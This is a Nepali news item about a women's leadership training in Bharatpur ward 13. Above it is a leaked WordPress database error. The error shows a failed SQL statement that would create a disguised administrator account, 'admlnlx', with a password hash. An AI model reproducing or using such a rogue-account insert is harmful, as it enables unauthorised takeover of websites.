WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzWXuHj4QKt1yAc6Ef84dxEvKQ9TWa0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 07:32:38', '', 'admlnlx', 'admlnlx')
चितवन, फागुन २-
भरतपुर उपमहानगरपालिकाको वडा नम्बर १३का महिलाहरुका लागि नेतृत्व विकास तालिम सुरु भएको छ ।
नेतृत्वमा आउन चाहेका महिलाहरुका लागि तालिमको आयोजना गरिएको हो । वडा नागरिक मंञ्चले तीन दिने नेतृत्व विकास तथा उद्घोषण तालिमको आयोजना गरेको तालिममा वडाका ५० जना महिलाको सहभागीता रहेको छ । दलित , आदीवासी जनजाती , पिछडीएका महिलाहरुको पनि उल्लेख्य सहभागिता रहेको छ । सामाजिक नेतृत्वमा महिलाहरु पछाडी परेको भन्दै तालिमको आयोजना गरेको आयोजकले जनाएको छ ।
तालिममा पत्रकारहरु अजिता अधिकारी , अनिल ढकाल र गोपाल दराई प्रशिक्षण दिनेछन । वडा नागरिक मञ्चका संयोजक देवकी गौतमको अध्यक्षता तथा पूर्व वडा अध्यक्ष डिल्लीराम लामिछानेको प्रमुख आतिथ्यतामा भएको उद्धघाटन कार्यक्रममा नेका काँग्रेसका वडा सभापति युवराज भुषाल , दुर्गा टोल विकास संस्थाका अध्यक्ष नन्दलाल पराजुली वडा नागरिक मञ्चकी उपाध्यक्ष देवि आचार्य , टिकाराम सापकोटा लगाएतले मन्तब्य ब्यक्त गरेका थिए ।